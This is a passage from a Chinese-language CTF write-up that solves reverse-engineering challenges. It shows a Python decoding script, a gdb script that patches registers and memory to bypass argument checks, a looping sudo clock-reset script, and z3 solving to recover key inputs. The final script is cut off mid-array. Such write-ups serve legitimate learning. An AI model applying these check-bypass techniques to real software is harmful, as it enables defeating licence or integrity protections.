</span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x8f</span><span class="p">,</span> <span class="mh">0xaa</span><span class="p">,</span> <span class="mh">0x85</span><span class="p">,</span> <span class="mh">0xa0</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0xac</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0xb6</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0xbe</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0xb4</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0xb1</span><span class="p">,</span> <span class="mh">0xbe</span><span class="p">,</span> <span class="mh">0xbc</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0xb1</span><span class="p">,</span> <span class="mh">0xbc</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0x9d</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0xbc</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0x42</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0xb1</span><span class="p">,</span> <span class="mh">0xbe</span><span class="p">,</span> <span class="mh">0xb2</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0x42</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">]</span> <span class="n">ans</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">42</span><span class="p">):</span> <span class="n">ans</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">((((</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xAA</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0x55</span><span class="p">)))</span> <span class="o">-</span> <span class="mi">9</span><span class="p">)</span> <span class="k">print</span> <span class="n">ans</span> </code></pre></td></tr></table> </div> </div><h3 id="0x08-2018-rev">0x08 2018-rev</h3> <p>这个我也不知道用的是不是预期解。</p> <p>直接运行文件，提示</p> <blockquote> <p>argc == 2018 &amp;&amp; argv[0][0] == 1 &amp;&amp; envp[0][0] == 1</p> </blockquote> <p>经过调试写了一个gdb脚本绕过第一层验证</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">b *0x4005F0 r <span class="c1">#set args</span> <span class="nb">set</span> <span class="nv">$rdi</span><span class="o">=</span><span class="m">2018</span> <span class="c1">#dumpargs --force</span> <span class="nb">set</span> *<span class="o">((</span>long *<span class="o">)</span>0x7fffffffe332<span class="o">)=</span>0x0101010101010101 <span class="nb">set</span> *<span class="o">((</span>long *<span class="o">)</span>0x7fffffffe34d<span class="o">)=</span>0x0101010101010101 c <span class="c1"># zdump /etc/localtime</span> <span class="c1"># 因为ASLR请自行修改对应地址</span> </code></pre></td></tr></table> </div> </div><p>第二层验证提示</p> <blockquote> <p>Bad timing, you should open this at 2018/1/1 00:00:00 (UTC) :(</p> </blockquote> <p>刚开始的想法也是和第一层验证一样设置运行过程中各个参数的值，但后来发现这些很难找，卡了一段时间后如梦初醒，程序的运行时间是从**/etc/localtime**获取的(代码中可以看出)，只要保证程序运行的瞬间**zdump /etc/localtime**的值为**2018/1/1 00:00:00 (UTC)**即可，关于如何设置时间，刚开始的想法是在gdb调试过程中set，尝试了很久，最后还是写了一个shellscript</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash"><span class="cp">#!/usr/bin/env bash </span><span class="cp"></span> <span class="k">while</span> <span class="nb">true</span> <span class="k">do</span> sudo date -us <span class="s2">&#34;2018-01-01 00:00:00&#34;</span> <span class="k">done</span> </code></pre></td></tr></table> </div> </div><p>这样一直运行setTime.sh，然后gdb导入gdb脚本，即可获得flag</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnt5h2bv7vj311y0lcnek.jpg" alt=""></p> <p>这个题好像是文件放错了，最后的flag不完全正确，但很容易能猜出正确的flag</p> <h3 id="0x09-what-the-hell">0x09 what-the-hell</h3> <p>这个题有点意思,看题目的提示好像是要优化算法,但我用了非预期解.我把思路和写残了的代码放出来,供大家参考.</p> <p>用IDA打开,calc_key3的逻辑很清晰,就是运算比较麻烦根据题意应该就是要优化这里了.但看到这里的条件时我忽然想到了前一阵看到的z3,试了一下,很快就跑出来了,计算a1,a2的z3代码如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-Python" data-lang="Python"><span class="k">def</span> <span class="nf">getInput</span><span class="p">():</span> <span class="n">a2</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s1">&#39;a2&#39;</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="n">a1</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s1">&#39;a1&#39;</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="c1"># print type(a2)</span> <span class="c1"># print type(a1)</span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a2</span> <span class="o">*</span> <span class="n">a1</span> <span class="o">==</span> <span class="mh">0xDDC34132</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(((</span><span class="n">a1</span> <span class="o">-</span> <span class="n">a2</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xCDF</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">((</span><span class="n">a1</span> <span class="o">^</span> <span class="mh">0x7E</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">a2</span> <span class="o">+</span> <span class="mi">16</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0x732092BE</span><span class="p">)</span> <span class="k">while</span> <span class="n">s</span><span class="o">.</span><span class="n">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span> <span class="k">if</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a1</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">()):</span> <span class="k">print</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">Or</span><span class="p">(</span><span class="n">a1</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a1</span><span class="p">],</span> <span class="n">a2</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a2</span><span class="p">]))</span> <span class="k">else</span><span class="p">:</span> <span class="k">print</span> <span class="s2">&#34;unset&#34;</span> </code></pre></td></tr></table> </div> </div><p>跑出了符合题意的两组解:</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm5r6u7hgwj30br02ajrx.jpg" alt=""></p> <p>可以看出,what函数实际上是一个求斐波那契数列的函数</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm5r7sn3a9j30dq0adglk.jpg" alt=""></p> <p>但这里有一个坑点,result是int型的,要考虑溢出,经过测试,当a1=4284256177时,函数有解,返回值1095061718431,这样我们就得到了decrypt_flag的三个参数,就可以写脚本跑出flag了,脚本如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-Python" data-lang="Python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">libnum</span> <span class="kn">import</span> <span class="n">prime_test</span> <span class="k">as</span> <span class="n">isPrime</span> <span class="kn">from</span> <span class="nn">libnum</span> <span class="kn">import</span> <span class="n">n2s</span> <span class="k">def</span> <span class="nf">getInput</span><span class="p">():</span> <span class="n">a2</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s1">&#39;a2&#39;</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="n">a1</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s1">&#39;a1&#39;</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="c1"># print type(a2)</span> <span class="c1"># print type(a1)</span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a2</span> <span class="o">*</span> <span class="n">a1</span> <span class="o">==</span> <span class="mh">0xDDC34132</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(((</span><span class="n">a1</span> <span class="o">-</span> <span class="n">a2</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xCDF</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">((</span><span class="n">a1</span> <span class="o">^</span> <span class="mh">0x7E</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">a2</span> <span class="o">+</span> <span class="mi">16</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0x732092BE</span><span class="p">)</span> <span class="k">while</span> <span class="n">s</span><span class="o">.</span><span class="n">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span> <span class="k">if</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a1</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">()):</span> <span class="k">print</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">Or</span><span class="p">(</span><span class="n">a1</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a1</span><span class="p">],</span> <span class="n">a2</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a2</span><span class="p">]))</span> <span class="k">else</span><span class="p">:</span> <span class="k">print</span> <span class="s2">&#34;unset&#34;</span> <span class="k">def</span> <span class="nf">getKey3</span><span class="p">():</span> <span class="n">fib</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">9999999</span><span class="p">):</span> <span class="c1"># print i - 1, (fib[i - 1] &amp; 0xffffffff)</span> <span class="n">fib</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">fib</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">fib</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">2</span><span class="p">])</span> <span class="k">if</span> <span class="p">(</span><span class="n">fib</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span> <span class="o">==</span> <span class="mi">4284256177</span><span class="p">:</span> <span class="k">return</span> <span class="n">i</span> <span class="o">*</span> <span class="mi">1234567890</span> <span class="o">+</span> <span class="mi">1</span> <span class="k">def</span> <span class="nf">getFlag</span><span class="p">():</span> <span class="n">junk_data</span> <span class="o">=</span> <span class="p">[</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="mh">0x8C</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0x2F</span><span class="p">,</span> <span class="mh">0x19</span><span class="p">,</span> <span class="mh">0x8D</span><span class="p">,</span> <span class="mh">0xF8</span><span class="p">,</span> <span class="mh">0xF3</span><span class="p">,</span> <span class="mh">0x79</span><span class="p">,</span> <span class="mh">0x81</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0x93</span><span class="p">,</span> <span class="mh">0x99</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x9C</span><span class="p">,</span> <span class="mh">0xF0</span><span class="p">,</span> <span class="mh">0x34</span><span class="p">,</span> <span class="mh">0x99</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="mh">0xB1</span><span class="p">,</span> <span class="mh">0x84</span><span class="p">,</span> <span class="mh">0x1D</span><span class="p">,</span> <span class="mh">0xF0</span><span class="p">,</span> <span class="mh">0x8F</span><span class="p">,</span> <span class="mh">0x7E</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0xCB</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0xF8</span><span class="p">,</span> <span class="mh">0x4E</span><span class="p">,</span> <span class="mh">0xD1</span><span class="p">,</span> <span class="mh">0x42</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0xAC</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">,</span> <span class="mh">0xE4</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0xA9</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0xD9</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0xFC</span><span class="p">,</span> <span class="mh">0x1D</span><span class="p">,</span> <span class="mh">0x85</span><span class="p">,</span> <span class="mh">0xEA</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0x07</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0xC9</span><span class="p">,</span> <span class="mh">0x19</span><span class="p">,</span> <span class="mh">0x86</span><span class="p">,</span> <span class="mh">0xC9</span><span class="p">,</span> <span class="mh">0xDC</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0x3B</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x92</span><span class="p">,</span> <span class="mh">0x4C</span><span class="p">,</span> <span class="mh">0x9F</span><span class="p">,</span> <span class="mh">0xD9</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0xDD</span><span class="p">,</span> <span class="mh">0x98</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0xB1</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0xA5</span><span class="p">,</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x91</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0xDF</span><span class="p">,</span> <span class="mh">0xAF</span><span class="p">,</span> <span class="mh">0x3A</span><span class="p">,</span> <span class="mh">0x7E</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x91</span><span class="p">,</span> <span class="mh">0x19</span><span class="p">,</span> <span class="mh">0x22</span><span class="p">,</span> <span class="mh">0xFD</span><span class="p">,</span> <span class="mh">0xFE</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x0A</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x86</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0xC1</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0xCE</span><span class="p">,</span> <span class="mh">0x06</span><span class="p">,</span> <span class="mh">0x25</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0xF0</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0xBB</span><span class="p">,</span> <span class="mh">0xED</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x3E</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x0E</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0xB8</span><span class="p">,</span> <span class="mh">0x8A</span><span class="p">,</span> <span class="mh">0x9C</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xC3</span><span class="p">,</span> <span class="mh">0xB0</span><span class="p">,</span> <span class="mh">0x25</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0xCB</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0x86</span><span class="p">,</span> <span class="mh">0xA6</span><span class="p">,</span> <span class="mh">0x7A</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0x0A</span><span class="p">,</span> <span class="mh">0x19</span><span class="p">,</span> <span class="mh">0x7C</span><span class="p">,</span> <span class="mh">0x07</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0xA2</span><span class="p">,</span> <span class="mh">0x4E</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x4A</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0xAF</span><span class="p">,</span> <span class="mh">0xC2</span><span class="p">,</span> <span class="mh">0x9C</span><span class="p">,</span> <span class="mh">0xFD</span><span class="p">,</span> <span class="mh">0x89</span><span class="p">,</span> <span class="mh">0xE6</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0xF6</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0xF5</span><span class="p">,</span> <span class="mh">0x98</span><span class="p">,</span> <span class="mh">0x55</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0x12</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0xA6</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0xBE</span><span class="p">,</span> <span class="mh">0x85</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0x64</span><span class="p">,</span> <span class="mh">0x5E</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0xD8</span><span class="p">,</span> <span class="mh">0xBB</span><span class="p">,</span> <span class="mh">0x39</span><span class="p">,</span> <span class="mh">0x3D</span><span class="p">,</span> <span class="mh">0x7B</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="mh">0xB5</span><span class="p">,</span> <span class="mh">0xF8</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0xFC</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0xF3</span><span class="p">,</span> <span class="mh">0xC1</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0xA4</span><span class="p">,</span> <span class="mh">0xBE</span><span class="p">,</span> <span class="mh">0x8D</span><span class="p">,</span> <span class="mh">0xA5</span><span class="p">,</span> <span class="mh">0xEA</span><span class="p">,</span> <span class="mh">0xDD</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0xEF</span><span class="p">,</span> <span class="mh">0x07</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0xCF</span><span class="p">,</span> <span class="mh">0x39</span><span class="p">,</span> <span class="mh">0x7D</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span> <span class="mh">0xE7</span><span class="p">,</span> <span class="mh">0x46</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0xC2</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0xE7</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="mh">0xE8</span><span class="p">,</span> <span class="mh">0x86</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span> <span class="mh">0x77</span><span class="p">,</span> <span class="mh">0x6C</span><span class="p">,</span> <span class="mh">0x7D</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xCE</span><span class="p">,</span> <span class="mh">0xCC</span><span class="p">,</span> <span class="mh">0x9C</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0x8D</span><span class="p">,</span> <span class="mh">0xD1</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x98</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0x4F</span><span class="p">,</span> <span class="mh">0xE8</span><span class="p">,</span> <span class="mh">0x1F</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="mh">0x3A</span><span class="p">,</span> <span class="mh">0x8A</span><span class="p">,</span> <span class="mh">0x5B</span><span class="p">,</span> <span class="mh">0x1A</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x55</span><span class="p">,</span> <span class="mh">0xF0</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0xCF</span><span class="p">,</span> <span class="mh">0xD8</span><span class="p">,</span> <span class="mh">0x6D</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="mh">0x9A</span><span class="p">,</span> <span class="mh">0xD8</span><span class="p">,</span> <span class="mh">0xD8</span><span class="p">,</span> <span class="mh">0x5D</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0x7E</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="mh">0x3F</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0x78</span><span class="p">,</span> <span class="mh">0xAF</span><span class="p">,</span> <span class="mh">0xB3</span><span class="p">,</span> <span class="mh">0xB0</span><span class="p">,</span> <span class="mh">0xC3</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0xAB</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0xE6</span><span class="p">,</span> <span class="mh">0xC1</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x25</span><span class="p">,</span> <span class="mh">0x4B</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x3C</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0x16</span><span 